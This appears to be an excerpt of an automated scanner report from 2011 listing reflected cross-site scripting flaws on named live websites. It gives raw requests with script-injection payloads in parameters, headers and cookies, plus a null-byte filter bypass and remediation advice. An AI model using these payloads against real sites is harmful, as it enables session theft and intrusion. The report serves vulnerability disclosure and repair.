GET /a/diff/436/1053353/show0.asp?1053353;167347;7653005851078549651;[timestamp];M&1d523'-alert(1)-'f79aa0fec9c=1 HTTP/1.1 Host: www4.smartadserver.com Proxy-Connection: keep-alive Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea66d80addda User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; TestIfCookie=ok; TestIfCookieP=ok; pbwmaj5=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D6%3B%24sw%3D6; pid=7653005851078549651; pdomid=4
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 23 Apr 2011 17:43:06 GMT Content-Length: 363
2.97. http://www4.smartadserver.com/a/diff/436/1053353/show0.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www4.smartadserver.com
Path:
/a/diff/436/1053353/show0.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9652a<script>alert(1)</script>43ca9da9cf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /a/diff/436/1053353/show0.asp?1053353;167347;7653005851078549651;%5btimestamp%5d;M&9652a<script>alert(1)</script>43ca9da9cf3=1 HTTP/1.1 Host: www4.smartadserver.com Proxy-Connection: keep-alive Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; pdomid=4; pbw=%24b%3D16999%3B%24o%3D11061%3B%24c%3D42%3B; pid=7653005851078549651; TestIfCookie=ok; TestIfCookieP=ok
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 23 Apr 2011 17:41:39 GMT Content-Length: 548
if (screen.width && screen.height) {var jsinfocall=new Image;jsinfocall.src='http://www4.smartadserver.com/a/track/jsinfo.asp?sw='+screen.width+'&sh='+screen.height;}
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8692'-alert(1)-'f007626cf8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /call/adj/167347d8692'-alert(1)-'f007626cf8e/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no?[countgo] HTTP/1.1 Host: www4.smartadserver.com Proxy-Connection: keep-alive Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea66d80addda User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; pdomid=4; pid=7653005851078549651; TestIfCookie=ok; TestIfCookieP=ok; pbwmaj5=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D6%3B%24sw%3D6
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 23 Apr 2011 17:50:17 GMT Content-Length: 360
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20d85'-alert(1)-'9595c27d68e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]20d85'-alert(1)-'9595c27d68e/no?[countgo] HTTP/1.1 Host: www4.smartadserver.com Proxy-Connection: keep-alive Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea66d80addda User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; pdomid=4; pid=7653005851078549651; TestIfCookie=ok; TestIfCookieP=ok; pbwmaj5=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D6%3B%24sw%3D6
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 23 Apr 2011 17:54:12 GMT Content-Length: 360
The value of the [countgo] request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7adb'%3balert(1)//9c59d422aa1 was submitted in the [countgo] parameter. This input was echoed as b7adb';alert(1)//9c59d422aa1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no?[countgo]b7adb'%3balert(1)//9c59d422aa1 HTTP/1.1 Host: www4.smartadserver.com Proxy-Connection: keep-alive Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: ASPSESSIONIDQQDCCDAR=NLMKNGDBDAAJEJEPCMNIIBEE; path=/ Date: Sat, 23 Apr 2011 17:37:25 GMT Set-Cookie: BIGipServerSMART2=1678181130.20480.0000; path=/ Content-Length: 355
2.101. http://www4.smartadserver.com/call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 353ce'%3balert(1)//ef8e1dee706 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 353ce';alert(1)//ef8e1dee706 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no?[countgo]&353ce'%3balert(1)//ef8e1dee706=1 HTTP/1.1 Host: www4.smartadserver.com Proxy-Connection: keep-alive Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: ASPSESSIONIDCAQBRTDS=CCHIPEABOMHDBGNJMOFPFFCD; path=/ Date: Sat, 23 Apr 2011 17:38:52 GMT Set-Cookie: BIGipServerSMART2=1325859594.23040.0000; path=/ Content-Length: 358
The value of the [countgo] request parameter is copied into the HTML document as plain text between tags. The payload 1e510<script>alert(1)</script>45afb62f8ad was submitted in the [countgo] parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /call/adjnc/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/%5Btimestamp%5D/no?[countgo]1e510<script>alert(1)</script>45afb62f8ad HTTP/1.1 Host: www4.smartadserver.com Proxy-Connection: keep-alive Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TestIfCookieP=ok; TestIfCookie=ok; ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 23 Apr 2011 17:37:18 GMT Content-Length: 554
if (screen.width && screen.height) {var jsinfocall=new Image;jsinfocall.src='http://www4.smartadserver.com/a/track/jsinfo.asp?sw='+screen.width+'&sh='+screen.height;}
2.103. http://www4.smartadserver.com/call/adjnc/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/%5Btimestamp%5D/no [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4a6bc<script>alert(1)</script>7ab968a4c2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /call/adjnc/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/%5Btimestamp%5D/no?[countgo]&4a6bc<script>alert(1)</script>7ab968a4c2a=1 HTTP/1.1 Host: www4.smartadserver.com Proxy-Connection: keep-alive Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TestIfCookieP=ok; TestIfCookie=ok; ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 23 Apr 2011 17:42:21 GMT Content-Length: 557
if (screen.width && screen.height) {var jsinfocall=new Image;jsinfocall.src='http://www4.smartadserver.com/a/track/jsinfo.asp?sw='+screen.width+'&sh='+screen.height;}
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00e289a"-alert(1)-"81fc8afb6e1 was submitted in the User-Agent HTTP header. This input was echoed as e289a"-alert(1)-"81fc8afb6e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /news/security/attacks/229402094 HTTP/1.1 Host: www.informationweek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16%00e289a"-alert(1)-"81fc8afb6e1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41842"><script>alert(1)</script>4b6f05419af was submitted in the Referer HTTP header. This input was echoed as 41842\"><script>alert(1)</script>4b6f05419af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=41842"><script>alert(1)</script>4b6f05419af
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d90a'-alert(1)-'ff7f2bdc6e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm HTTP/1.1 Host: www.volkswagensouthburlington.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=3d90a'-alert(1)-'ff7f2bdc6e0
Response
HTTP/1.1 200 OK Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16 P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Content-Type: text/html;charset=iso-8859-1 X-DDC-Arch-Trace: ,HttpResponse,CookieSet Vary: Accept-Encoding Date: Sat, 23 Apr 2011 15:54:13 GMT Connection: close Set-Cookie: ssoid=8310f0e90a0a006e00d46b954045410c;path=/ Set-Cookie: JSESSIONID=3ia0vdueobjf5;path=/ Set-Cookie: ddcpoolid=CmsPoolG;path=/; Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 74136
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eff1a"><script>alert(1)</script>95b497433a1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm HTTP/1.1 Host: www.volkswagensouthburlington.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=eff1a"><script>alert(1)</script>95b497433a1
Response
HTTP/1.1 200 OK Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16 P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Content-Type: text/html;charset=iso-8859-1 X-DDC-Arch-Trace: ,HttpResponse,CookieSet Vary: Accept-Encoding Date: Sat, 23 Apr 2011 15:54:11 GMT Connection: close Set-Cookie: ssoid=8310e6320a0a006e00d46b957ebc568a;path=/ Set-Cookie: JSESSIONID=re5c5k752csh;path=/ Set-Cookie: ddcpoolid=CmsPoolG;path=/; Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 74166
<title>Used 2010 Volkswagen Jetta Sportwagen S For Sale in South Burlington VT | VW Dealers Ver ...[SNIP]... <img src="http://hits.dealer.com/clear.gif?&4=0&5=0&10=http://www.google.com/search?hl=en&q=eff1a"><script>alert(1)</script>95b497433a1&20=www.volkswagensouthburlington.com&21=/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm&50=8310e6320a0a006e00d46b957ebc568a&51=&52=&53=&a ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b12e0"%3balert(1)//bfb8dac7af7 was submitted in the cli cookie. This input was echoed as b12e0";alert(1)//bfb8dac7af7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.rubiconmcclatchy.ron/audience;sz=300x250;net=iblocal;ord=4049553634;ord1=908824;cmpgurl=http%253A//www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11f8f328940989eb12e0"%3balert(1)//bfb8dac7af7; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sun, 24 Apr 2011 03:11:04 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:04 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:04 GMT Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:04 GMT Content-Length: 7706
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... </scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11f8f328940989eb12e0";alert(1)//bfb8dac7af7&seg_code=noseg&ord=1303614664",true);CollectiveMedia.addPixel("http://tags.bluekai.com/site/2731",false);CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=187524340;re ...[SNIP]...
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 83651<script>alert(1)</script>1021085a0ae was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 69437<script>alert(1)</script>6795e865c60 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload 83bdf<script>alert(1)</script>98406144f62 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 1d12e<script>alert(1)</script>f044f07ba60 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload c8242<script>alert(1)</script>3748b3af4f8 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload a63c0<script>alert(1)</script>e755c95c29a was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7a27"-alert(1)-"704419ea05 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee657"-alert(1)-"82b2db44a49 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f849a"-alert(1)-"de2ba14b2ac was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
